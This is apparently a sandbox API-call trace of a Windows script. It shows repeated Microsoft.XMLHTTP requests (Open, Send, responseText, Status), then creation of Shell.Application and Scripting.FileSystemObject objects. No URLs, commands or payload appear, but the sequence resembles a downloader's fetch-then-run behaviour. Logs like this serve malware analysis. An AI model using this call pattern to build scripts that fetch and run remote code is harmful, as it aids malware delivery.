	[0303.884] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.884] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7200) returned 0x0
	[0303.884] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0303.885] ??2@YAPEAX_K@Z () returned 0x62f310
	[0303.885] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.885] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7200) returned 0x0
	[0303.885] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7200) returned 0x3
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.885] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7200, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7200, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.885] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.885] SysStringLen (param_1=0x0) returned 0x0
	[0303.885] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.885] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74f0) returned 0x0
	[0303.885] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7558) returned 0x0
	[0303.885] ??2@YAPEAX_K@Z () returned 0x62f330
	[0303.885] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7558, pUnkSite=0x62f330) 
	[0303.885] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.886] XMLHTTPRequest:IUnknown:Release (This=0x49c7558) returned 0x0
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74f0) returned 0x0
	[0303.886] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74f0) returned 0x3
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.886] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74f0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74f0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.886] longjmp () 
	[0303.886] longjmp () 
	[0303.886] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.886] SysStringLen (param_1=0x0) returned 0x0
	[0303.886] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.886] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5c20) returned 0x0
	[0303.886] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0303.886] ??2@YAPEAX_K@Z () returned 0x62f310
	[0303.886] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0303.886] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.887] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5c20) returned 0x0
	[0303.887] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5c20) returned 0x3
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.887] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5c20, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5c20, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.887] longjmp () 
	[0303.887] longjmp () 
	[0303.887] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0303.887] SysStringLen (param_1=0x0) returned 0x0
	[0303.887] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0303.887] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0303.887] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7208) returned 0x0
	[0303.887] ??2@YAPEAX_K@Z () returned 0x62f330
	[0303.887] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7208, pUnkSite=0x62f330) 
	[0303.887] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0303.888] XMLHTTPRequest:IUnknown:Release (This=0x49c7208) returned 0x0
	[0303.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0303.888] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0303.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.888] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0303.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0303.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0303.888] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0303.888] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0305.012] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0305.012] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0305.012] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0305.012] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0305.012] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0305.012] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0305.012] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0305.012] SysStringLen (param_1=0x0) returned 0x0
	[0305.012] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0305.013] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0305.013] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0305.013] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0305.013] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0305.013] ??2@YAPEAX_K@Z () returned 0x62f350
	[0305.013] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0305.013] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0305.013] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0305.013] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0305.013] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0305.013] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0305.013] SysStringLen (param_1=0x0) returned 0x0
	[0305.013] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0305.017] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0305.017] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0305.017] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0305.017] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0305.017] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0305.017] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0306.767] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0306.768] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0306.768] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0306.769] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0306.769] SysStringLen (param_1=0x0) returned 0x0
